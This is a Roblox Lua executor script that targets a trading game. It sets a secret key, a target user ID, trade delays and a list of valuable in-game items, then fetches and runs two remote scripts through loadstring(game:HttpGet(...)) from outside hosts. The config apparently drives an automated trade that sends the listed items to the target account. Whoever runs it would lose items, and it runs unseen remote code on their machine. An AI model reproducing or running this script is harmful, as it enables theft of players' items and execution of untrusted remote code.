getgenv().SECRET_KEY = "mrr_007d378d418f47eeafe379d62c730ce9"
getgenv().TARGET_ID = 6219924104
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Foxini Lanternini"] = true,
    ["Strawberry Elephant"] = true,
    ["Meowl"] = true,
    ["Headless Horseman"] = true,
    ["Skibidi Toilet"] = true,
    ["Griffin"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Love Love Bear"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Rosey and Teddy"] = true,
    ["Capitano Moby"] = true,
    ["Cooki and Milki"] = true,
    ["Burguro And Fryuro"] = true,
    ["Ketupat Bros"] = true,
    ["Reinito Sleighito"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Los Amigos"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Sekolahs"] = true,
    ["Signore Carapace"] = true,
    ["La Casa Boo"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Food Combinasion"] = true,
    ["Elefanto Frigo"] = true,
    ["Spooky and Pumpky"] = true,
    ["Ginger Gerat"] = true,
    ["Sammyni Fattini"] = true,
    ["Festive 67"] = true,
    ["Cloverat Clapat"] = true,
    ["Garama and Madundung"] = true,
    ["Fishino Clownino"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Boppin Bunny"] = true,
    ["Los Spaghettis"] = true,
    ["Antonio"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Dug dug dug"] = true,
    ["Lovin Rose"] = true,
    ["Hydra Bunny"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://api.jnkie.com/api/v1/luascripts/public/429f6ce60e0d66fa1c0b64d992c3105447cb60140ff3a6d25b5ff580b651754c/download"))()
end)
